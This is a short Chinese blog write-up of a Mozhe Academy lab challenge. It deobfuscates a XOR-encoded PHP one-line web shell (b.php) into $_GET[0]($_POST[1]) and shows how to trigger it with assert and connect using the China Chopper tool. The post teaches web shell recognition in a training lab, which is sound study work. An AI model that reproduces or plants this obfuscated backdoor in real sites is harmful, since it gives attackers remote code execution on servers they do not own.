墨者学院-PHP代码分析溯源(第1题)

靶场地址:

https://www.mozhe.cn/bug/detail/UW5xcFhsWE05akxJYjB1TzEyM2p3UT09bW96aGUmozhe

进入靶场,标题是b.php源码
然后映入眼帘的是一串看不懂的字符


b.php源码

<?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?>

其实这是一句话木马的变种,整理下
$_原来的值为0,经过$_++,变成1
在python中将字符的异或进行计算,解得$__=_GET,$___=_POST

解得的字符

$_布尔值为True,!$_则为False,值为0
整理${$__}[!$_](${$___}[$_]);得到 $_GET[0]($_POST[1]),是不是很眼熟,这其实就是一句话木马
提交参数b.php?0=assert,代码就变成了<?php assert($_POST[1]); ?>
因此上菜刀,密码为1,连接:

获得key

一句话变种参考:https://www.freebuf.com/articles/web/155891.html

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。